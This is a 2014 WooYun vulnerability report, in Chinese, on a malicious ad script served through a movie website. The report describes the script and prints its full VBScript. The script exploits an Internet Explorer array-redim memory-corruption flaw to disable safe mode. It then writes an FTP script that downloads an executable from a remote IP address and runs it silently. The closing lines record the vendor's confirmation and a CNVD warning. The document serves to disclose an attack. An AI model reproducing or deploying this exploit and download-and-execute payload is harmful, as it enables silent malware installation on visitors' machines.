乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-16: 细节已通知厂商并且等待厂商处理中 2014-11-21: 厂商已经确认,细节仅向厂商公开 2014-12-01: 细节向核心白帽子及相关领域专家公开 2014-12-11: 细节向普通白帽子公开 2014-12-21: 细节向实习白帽子公开 2014-12-31: 细节向公众公开
我在用百度浏览器的ie兼容模式浏览 http://www.dy2018.com 这个电影网站时,发现莫名其妙运行了一个叫“光芒微端”的游戏客户端,然后我就用smartsniff抓包分析,在查看源代码时发现了2529网盟的js广告代码,里面就是最新公布的18年陈酿的ie漏洞!引用这个js就会从它的ftp上下载kuaidu_2_23_01.exe并运行!
访问http://www.2529.com/page/ms.js就可以看到这个js代码了,用ie访问www.dy2018.com或者直接引用这个js都会自动在电脑上安装光芒微端
function runmumaa() On Error Resume NextSet objWsh = CreateObject("Wscript.Shell") objWsh.run "cmd.exe /c del /F %temp%\ftp.txt & echo open 218.2.22.173>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo user>>%temp%\ftp.txt&echo anonymous>>%temp%\ftp.txt&echo testpass>>%temp%\ftp.txt&echo get kuaidu_2_23_01.exe>>%temp%\ftp.txt & echo bye>>%temp%\ftp.txt ",0,trueobjWsh.run "cmd.exe /c cd %temp% & ftp -s:""%temp%\ftp.txt""",0,truewscript.sleep 1000objWsh.run """%temp%\kuaidu_2_23_01.exe""",0,truedocument.write(Err.Description)end function dim aa()dim ab()dim a0dim a1dim a2dim a3dim win9xdim intVersiondim rndadim funclassdim myarrayBegin()function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end ifend functionfunction BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5)end functionfunction Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Nextend functionsub testaa()end subfunction mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end functionfunction Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end functionfunction ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0)end function
你懂得!!!!!!
危害等级:中
漏洞Rank:10
确认时间:2014-11-21 08:25
作为安全事件确认,已经在CNVD周报中进行预警,对于最新披露的微软漏洞,该案例已经有较深入分析。rank 10
暂无